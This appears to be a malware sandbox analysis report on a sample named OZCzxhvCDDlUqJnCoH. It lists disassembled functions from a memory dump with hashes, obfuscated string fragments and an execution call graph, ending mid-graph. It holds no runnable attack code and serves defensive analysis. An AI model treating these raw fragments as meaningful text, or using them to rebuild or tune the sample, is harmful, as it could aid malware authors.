                                    • Opcode Fuzzy Hash: 54b57e0d0ba43a92f509b8394dcea6ff2e7ebfca9ec7307d98c7ce183daa6f0f
                                    • Instruction Fuzzy Hash: E3C110B1D002289EEB21DFA5DC44BEEBBB8AF45304F1041DDE54CAB241D7B55A88CF95
                                    Function 04B9E42A Relevance: 28.8, Strings: 23, Instructions: 50COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !=82$%4)%$%<=z$)<=j$)<=}$0!!=$0%8>$0'87$064~$43!}$4~0!$64~&$820%$8<06$8>?~$=}0!$?6}{$?~)9$Q$h}8<$}8<0$~9%<$~{j
                                    • API String ID: 0-2468648327
                                    • Opcode ID: 09e90e3dae48c340c2e053d03b97e24353cd6fdfcf132e5c7c6347d8e1d0e07f
                                    • Instruction ID: a922b0a3526a36689754a932ea042091b8ce154ed292c646295dbc6d187c1778
                                    • Opcode Fuzzy Hash: 09e90e3dae48c340c2e053d03b97e24353cd6fdfcf132e5c7c6347d8e1d0e07f
                                    • Instruction Fuzzy Hash: A32102B9C1538CAACB24DFD5E9801DEFFB5AB01200FA05548E4147F255D3350A0ACF9A
                                    Function 04B9E439 Relevance: 28.8, Strings: 23, Instructions: 45COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !=82$%4)%$%<=z$)<=j$)<=}$0!!=$0%8>$0'87$064~$43!}$4~0!$64~&$820%$8<06$8>?~$=}0!$?6}{$?~)9$Q$h}8<$}8<0$~9%<$~{j
                                    • API String ID: 0-2468648327
                                    • Opcode ID: 363d123851de6a7f48fb6ad5e5b88fdf2283c4fd13d4742ccf55af8043b03d6f
                                    • Instruction ID: 7195e1dbe39645005f3151bbbf4c962e0cde228c29bc4f706d7ff0b03dfcbde3
                                    • Opcode Fuzzy Hash: 363d123851de6a7f48fb6ad5e5b88fdf2283c4fd13d4742ccf55af8043b03d6f
                                    • Instruction Fuzzy Hash: 9D11CFB9C1538C9ACB14DFD5E98019EFFB5AB01200FA09548E4047F254D3765A0ACF9A
                                    Function 04BB9A79 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                    • API String ID: 0-3236418099
                                    • Opcode ID: 2f5b1fb7561f283819886cb5d31445852d7a19673d03811e8c7ca2ef6f2dcfa3
                                    • Instruction ID: 3056769bbc9e83bea403290df49a2bc3e5a89dfce47023514f909ac4bd38975e
                                    • Opcode Fuzzy Hash: 2f5b1fb7561f283819886cb5d31445852d7a19673d03811e8c7ca2ef6f2dcfa3
                                    • Instruction Fuzzy Hash: 419132B1900318AAEB20EF959C85FEE77BDEF44704F1041DDE608A6140EBB56B85CFA5
                                    Function 04BB9A6B Relevance: 25.1, Strings: 20, Instructions: 96COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                    • API String ID: 0-3236418099
                                    • Opcode ID: b18d3d45e4c9c016e7e4e3f2ee868ad4815ab7e2af829345a28449dcd57cc6f9
                                    • Instruction ID: f36f55de9dfb5f7839117a7fb2687bc96037d1c5b20c8440b5fd47d8dbddb0b9
                                    • Opcode Fuzzy Hash: b18d3d45e4c9c016e7e4e3f2ee868ad4815ab7e2af829345a28449dcd57cc6f9
                                    • Instruction Fuzzy Hash: 87410AB0C0031C9EEB60DFA58884BEEBBB9BF04748F1041DDA50CAA251E7B55B88CF55
                                    Function 04BB5479 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                    • API String ID: 0-392141074
                                    • Opcode ID: e41f48a55144b61bb75103b007d5a463ee0bebbafa91f5eadf3320ae55c36f41
                                    • Instruction ID: 4be84b0f661e1b1d69f39c32563a6abe0c8f12bb6fdf2163b59cbe7406bebed8
                                    • Opcode Fuzzy Hash: e41f48a55144b61bb75103b007d5a463ee0bebbafa91f5eadf3320ae55c36f41
                                    • Instruction Fuzzy Hash: 757120B5D00218AAEB25EFA4CC90FEE777DBF08704F0445DDE609AA150EB7167488BA5
                                    Function 04BB0799 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                    • API String ID: 0-2356907671
                                    • Opcode ID: 08f8f51afd38777b6690d8890267c165448591bb4ded553b2d697c3014b7eaeb
                                    • Instruction ID: d8c96d586ae90889e920b57d0af08a13d75afa5b4ebf6699d412d590df11859f
                                    • Opcode Fuzzy Hash: 08f8f51afd38777b6690d8890267c165448591bb4ded553b2d697c3014b7eaeb
                                    • Instruction Fuzzy Hash: BE8181B2C04318AAEB51EFA4DC90FEF73BCAF44708F0445D9B509A6140EA75A798CF65
                                    Function 04BA9630 Relevance: 13.9, Strings: 11, Instructions: 129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                    • API String ID: 0-685823316
                                    • Opcode ID: 71e72355da566fa70cb6b8e137dd15b4e35230376f1c07fc9eb19b324bfb1e15
                                    • Instruction ID: 7b2525092ac8bf1edcc706a7a370ca199dd5e2fb4d2cc5c90650646611b97e2a
                                    • Opcode Fuzzy Hash: 71e72355da566fa70cb6b8e137dd15b4e35230376f1c07fc9eb19b324bfb1e15
                                    • Instruction Fuzzy Hash: BB415DB5D00219AEEB10DF94CC84BEEBBF9AF44304F14859DE519A7240DBB566488BA4
                                    Function 04BA9639 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                    • API String ID: 0-685823316
                                    • Opcode ID: a425d136ab4633957fe9c03382dd27911f0640e7dca018673fad906a903034da
                                    • Instruction ID: 480de85289b5e335f98648dedaa45f4a0bee61d854f7a15d80b361edc89169c4
                                    • Opcode Fuzzy Hash: a425d136ab4633957fe9c03382dd27911f0640e7dca018673fad906a903034da
                                    • Instruction Fuzzy Hash: 442175B5D41218AAEF40DFD4DC85BEE77B9AF04704F00819DE518BA180DBB556488FA4
                                    Function 04BB9F19 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :$:$:$A$I$N$P$m$s$t
                                    • API String ID: 0-2304485323
                                    • Opcode ID: bf7bf24b809d410b9fef2693784097497cc262118ca2e964b24f82ba283c2344
                                    • Instruction ID: 43aafe1ba8180c56bbe3567396ce9bb59fd1994ea8fc80ed53bc02f95840b7cb
                                    • Opcode Fuzzy Hash: bf7bf24b809d410b9fef2693784097497cc262118ca2e964b24f82ba283c2344
                                    • Instruction Fuzzy Hash: DED1C9B5D04308ABDB50DFB5CC91BEEB7B9EF48304F04855DE10996244E7B9BA058F64
                                    Function 04BB9F14 Relevance: 12.7, Strings: 10, Instructions: 210COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :$:$:$A$I$N$P$m$s$t
                                    • API String ID: 0-2304485323
                                    • Opcode ID: f7ffd313eb430de5713f3014caffaca09efbf6e1fb6853fbd776b368ce59e01e
                                    • Instruction ID: e5ec7d707b777e6b148c96561f0563797a940cf24d43900bb06fbfeda08173d1
                                    • Opcode Fuzzy Hash: f7ffd313eb430de5713f3014caffaca09efbf6e1fb6853fbd776b368ce59e01e
                                    • Instruction Fuzzy Hash: 9D81D5B5D04308ABDB50DFE5C891BEEB7B9EF48304F14855DE109AB240E7B9AA05CF64
                                    Function 04B9E50F Relevance: 10.1, Strings: 8, Instructions: 54COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4$DDXQ$RUF]$X]_Q$]Z@[$bQFG$y[N]$}Z@Q
                                    • API String ID: 0-3520094000
                                    • Opcode ID: d28f957f0347ab3efdbaf55e118084aa49eaa668ac5e157f10f28bddfa5307e6
                                    • Instruction ID: a79d0bbab1886f6b1eca295559d49b1034e66f483576c858e3b96f8d2b413fe0
                                    • Opcode Fuzzy Hash: d28f957f0347ab3efdbaf55e118084aa49eaa668ac5e157f10f28bddfa5307e6
                                    • Instruction Fuzzy Hash: 7521BDB0C0128CDACB14CFE699856DDFFB0BB05749F608959D42A7F205D3359A42CF56
                                    Function 04B9E519 Relevance: 10.1, Strings: 8, Instructions: 51COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4$DDXQ$RUF]$X]_Q$]Z@[$bQFG$y[N]$}Z@Q
                                    • API String ID: 0-3520094000
                                    • Opcode ID: 7010159543a72eadd644aece4a0239f1e263490f93567228ab0f1019d8cb912f
                                    • Instruction ID: 1849da2e6e688a1db9e85c853335fbd33ef72e7669f026d5369e68914513f6a7
                                    • Opcode Fuzzy Hash: 7010159543a72eadd644aece4a0239f1e263490f93567228ab0f1019d8cb912f
                                    • Instruction Fuzzy Hash: 9221ABB0C0128CEACB14CFE6E9856DDFFB4AB05749F608959D42A3F205E3359A42CF56
                                    Function 04BBCE49 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: L$S$\$a$c$e$l
                                    • API String ID: 0-3322591375
                                    • Opcode ID: a8bcd6e5e3f89022fa6cf34e1b032f27619df252b12542d7eb2cfbee57fb873a
                                    • Instruction ID: 0e43fe396ea8e9d0127de9b8b28ba86d8f7d56b503cd0eb2d60c26911a27b635
                                    • Opcode Fuzzy Hash: a8bcd6e5e3f89022fa6cf34e1b032f27619df252b12542d7eb2cfbee57fb873a
                                    • Instruction Fuzzy Hash: F9418672C10218AADB50DFE4DC84AEEB7B8EF48714F0146DEE50DA7110E7B1AA458BD4
                                    Function 04BB5249 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F$P$T$f$r$x
                                    • API String ID: 0-2523166886
                                    • Opcode ID: 3695c284e80facc4f2e62c525279fe49ef775c136406801fad6f472f9d67fddf
                                    • Instruction ID: 045c382f098442575b892776733719c998e01662cd382d59178456f79f1f1649
                                    • Opcode Fuzzy Hash: 3695c284e80facc4f2e62c525279fe49ef775c136406801fad6f472f9d67fddf
                                    • Instruction Fuzzy Hash: 8151A171900315BAEB34DFA9DC44BEAB7FCEF04709F0446DEA54866180D7B4B645CBA2
                                    Function 04BB523A Relevance: 7.5, Strings: 6, Instructions: 42COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F$P$T$f$r$x
                                    • API String ID: 0-2523166886
                                    • Opcode ID: fce497fa283eb5cc4eb07a8ac674b6dc5309e62c40e78fa4b55dc2043bae4b36
                                    • Instruction ID: 1fd14d646bf62ceb9d6a672265add377f967ad0bdaefbc1fd2ce40018bcd46bb
                                    • Opcode Fuzzy Hash: fce497fa283eb5cc4eb07a8ac674b6dc5309e62c40e78fa4b55dc2043bae4b36
                                    • Instruction Fuzzy Hash: 6501A770C10218AADF20EFA594086DFBFB9FF05358F51819DD8186F200E7B55A0A8FD5
                                    Function 04BB4999 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $i$l$o$u
                                    • API String ID: 0-2051669658
                                    • Opcode ID: d41ed05f7c8b363a59962a0735cbf71cd89e57a7249dce768be5b35f000e10e9
                                    • Instruction ID: 7381fc9d24b95e5b46eab45fba4740a369bb272847f7cde5e4f1803a9769242b
                                    • Opcode Fuzzy Hash: d41ed05f7c8b363a59962a0735cbf71cd89e57a7249dce768be5b35f000e10e9
                                    • Instruction Fuzzy Hash: 44612EB5900204ABDB24DBA4CC80FEFB7FDEB48714F104999E559A7241E7B4BA458BA0
                                    Function 04BB4995 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $i$l$o$u
                                    • API String ID: 0-2051669658
                                    • Opcode ID: c7fa2b245f2fa35ade0ace8a945ac94d935f599987122119ddce704af2b14121
                                    • Instruction ID: d4a977b41fbeac79a87ad332fdf904170ce2da4749046f3e2b48999a3ee0f74a
                                    • Opcode Fuzzy Hash: c7fa2b245f2fa35ade0ace8a945ac94d935f599987122119ddce704af2b14121
                                    • Instruction Fuzzy Hash: 4341FAB1900208AFDB20DFA5DC84FEEBBFDEB48704F104559E659A7241D7B0AA45CBA0
                                    Function 04BB4639 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $e$k$o
                                    • API String ID: 0-3624523832
                                    • Opcode ID: 387f95a4f327b7e0f5602e474494a4df121db6a4ecd4bdd54d415c1c6b4ee213
                                    • Instruction ID: 5ece67b60e064a6689d3a2f1aa29a9af5532ec0af7e863eaa03e1ac1b31c3df2
                                    • Opcode Fuzzy Hash: 387f95a4f327b7e0f5602e474494a4df121db6a4ecd4bdd54d415c1c6b4ee213
                                    • Instruction Fuzzy Hash: A6B10AB5A00604AFDB24DFA8CC84FEFB7FDAF88704F108559F659A7240D675AA41CB90
                                    Function 04BB4F39 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $e$h$o
                                    • API String ID: 0-3662636641
                                    • Opcode ID: 173a41ffb6e3e81f572d18e997b887c3ab2fbc01d23540125a96ec4a0da3b894
                                    • Instruction ID: d9f78329110c31e82beca1f57268bc7f78dfae868e0e2947cee28f0c278d18cc
                                    • Opcode Fuzzy Hash: 173a41ffb6e3e81f572d18e997b887c3ab2fbc01d23540125a96ec4a0da3b894
                                    • Instruction Fuzzy Hash: 3D7142B29002187EEF65EB94CC84FEF737CAF49304F0041D9B549A6150EE756B888FA6
                                    Function 04BB44F9 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                    • API String ID: 0-2877786613
                                    • Opcode ID: 0a9ab79ebc2b57425d7461253c4ca126bdaf7627fbc1f794dae5710370a32b44
                                    • Instruction ID: b5c53902fa1495c7db2808d0ce67ac3a38d8066c3ca34f595c43ab0a77805a46
                                    • Opcode Fuzzy Hash: 0a9ab79ebc2b57425d7461253c4ca126bdaf7627fbc1f794dae5710370a32b44
                                    • Instruction Fuzzy Hash: D2313D75511118BBEB01EBA28C92FEF773DAF55604F005489FA046B181EBB47B05C7EA
                                    Function 04BB44F7 Relevance: 5.1, Strings: 4, Instructions: 116COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                    • API String ID: 0-2877786613
                                    • Opcode ID: e8ad30e9f683b72e909cc88fe9442b8f1f0b9c72bf85b560bc9aa51c49c380b6
                                    • Instruction ID: b4d5ffa94cc2095a1ffe09806a256e1ac0ee8615248bb70e0d11664cd6b86455
                                    • Opcode Fuzzy Hash: e8ad30e9f683b72e909cc88fe9442b8f1f0b9c72bf85b560bc9aa51c49c380b6
                                    • Instruction Fuzzy Hash: BD313C75911118BBEB01EBA28C92FEF7B3D9F55604F005489FA046B180EBB46B05C7EA
                                    Function 04BB4F2E Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $e$h$o
                                    • API String ID: 0-3662636641
                                    • Opcode ID: 4be32720cd557f3ee05d482c3e2330949b32fb629d2cb7ec5529c3b8522dcd60
                                    • Instruction ID: 6761294633b4355880960c7a938c2c4b5ccbe9cd808137418723aae3b40bc13d
                                    • Opcode Fuzzy Hash: 4be32720cd557f3ee05d482c3e2330949b32fb629d2cb7ec5529c3b8522dcd60
                                    • Instruction Fuzzy Hash: 55415FB1E04218BEEF54DBA48C40FEF73BCAF45704F4041D9B548A6140EA756B848F96
                                    Function 04BB0AC9 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6$P$Q$u
                                    • API String ID: 0-1633214214
                                    • Opcode ID: d6e3801d216ffae94e86a9c8a76cd1bde4172d7b32f4c6902cebf167264cf6b8
                                    • Instruction ID: 85d4f60756e39cef1cd9288a242d6d4908930c031cb292d227e4d9329e334d99
                                    • Opcode Fuzzy Hash: d6e3801d216ffae94e86a9c8a76cd1bde4172d7b32f4c6902cebf167264cf6b8
                                    • Instruction Fuzzy Hash: 6C3123B1A10109BBEB14DFA4DD45BFF77B8EF04308F004199E904A7240E7B5AA458BE5
                                    Function 04BB1EF9 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $e$k$o
                                    • API String ID: 0-3624523832
                                    • Opcode ID: a897c545bd218041fbef34f7717e2b187d08a7e144258a899a86358ded084de3
                                    • Instruction ID: 10288650298b478a5d43743df0cfa522bb2ead805ef87175a864df347ee630b8
                                    • Opcode Fuzzy Hash: a897c545bd218041fbef34f7717e2b187d08a7e144258a899a86358ded084de3
                                    • Instruction Fuzzy Hash: 8B01ADB2900218EBDB14DF99D8C4ADEB7B9FF08314F04824DE919AB201E771E945CBA4
                                    Function 04BB1EF8 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $e$k$o
                                    • API String ID: 0-3624523832
                                    • Opcode ID: 6645bec3994ca1edc33021b82a3c12a17eca149084e9132d1a23ee94b03ebd2b
                                    • Instruction ID: 026f68e9a3eefd3697309f6cb3f674e0dc43209f1e74e0b09ea1d8654e82a081
                                    • Opcode Fuzzy Hash: 6645bec3994ca1edc33021b82a3c12a17eca149084e9132d1a23ee94b03ebd2b
                                    • Instruction Fuzzy Hash: 8201A5B2900218EFDB14DF99D8C4ADEB7B9FF08314F04825DE9196B201E771A545CBA0
                                    Function 04BA1BE9 Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #$5$D$b
                                    • API String ID: 0-2622648334
                                    • Opcode ID: 788ef259fe25a8d528f51b67e656537d836f0a612b9179abe46eeeb2d6f7e868
                                    • Instruction ID: 96e6218c3815820952ee9bdee3853aa2c084da6e74de5e7b89db3ef698835d52
                                    • Opcode Fuzzy Hash: 788ef259fe25a8d528f51b67e656537d836f0a612b9179abe46eeeb2d6f7e868
                                    • Instruction Fuzzy Hash: 7F11CC20D0C7CED9DB12CABC84086AEBF715B23224F0883C9D5F46B2D2D2754716D7A6

                                    Execution Graph

                                    Execution Coverage:2.8%
                                    Dynamic/Decrypted Code Coverage:4.3%
                                    Signature Coverage:1.6%
                                    Total number of Nodes:437
                                    Total number of Limit Nodes:71
                                    execution_graph 89596 2fd823e 89597 2fd8243 89596->89597 89598 2fd8202 89597->89598 89600 2fd6c80 LdrInitializeThunk LdrInitializeThunk 89597->89600 89600->89598 89601 5142ad0 LdrInitializeThunk 89602 2fc9670 89604 2fc967f 89602->89604 89603 2fc96c0 89604->89603 89605 2fc96ad CreateThread 89604->89605 89606 2fd6a70 89607 2fd6a9a 89606->89607 89610 2fd7990 89607->89610 89609 2fd6abe 89611 2fd79ad 89610->89611 89617 2fe7780 89611->89617 89613 2fd79fd 89614 2fd7a04 89613->89614 89622 2fe7850 89613->89622 89614->89609 89616 2fd7a2d 89616->89609 89618 2fe780d 89617->89618 89619 2fe77a4 89617->89619 89627 5142f30 LdrInitializeThunk 89618->89627 89619->89613 89620 2fe7846 89620->89613 89623 2fe78f2 89622->89623 89625 2fe7877 89622->89625 89628 5142d10 LdrInitializeThunk 89623->89628 89624 2fe7937 89624->89616 89625->89616 89627->89620 89628->89624 89629 2fd6e30 89630 2fd6e49 89629->89630 89631 2fd6e9c 89629->89631 89630->89631 89639 2fe8020 89630->89639 89633 2fd6fc5 89631->89633 89643 2fd6250 NtClose LdrInitializeThunk LdrInitializeThunk 89631->89643 89634 2fd6e64 89642 2fd6250 NtClose LdrInitializeThunk LdrInitializeThunk 89634->89642 89636 2fd6f9f 89636->89633 89644 2fd6420 NtClose LdrInitializeThunk LdrInitializeThunk 89636->89644 89640 2fe803a 89639->89640 89641 2fe804b NtClose 89640->89641 89641->89634 89642->89631 89643->89636 89644->89633 89645 2fd57f0 89650 2fe7690 89645->89650 89649 2fd583b 89651 2fe76ad 89650->89651 89659 5142c0a 89651->89659 89652 2fd5826 89654 2fe80b0 89652->89654 89655 2fe8131 89654->89655 89657 2fe80d4 89654->89657 89662 5142e80 LdrInitializeThunk 89655->89662 89656 2fe8162 89656->89649 89657->89649 89660 5142c1f LdrInitializeThunk 89659->89660 89661 5142c11 89659->89661 89660->89652 89661->89652 89662->89656 89663 2fdef70 89664 2fdefd4 89663->89664 89692 2fd5fc0 89664->89692 89666 2fdf104 89667 2fdf0fd 89667->89666 89699 2fd60d0 89667->89699 89669 2fdf2a3 89670 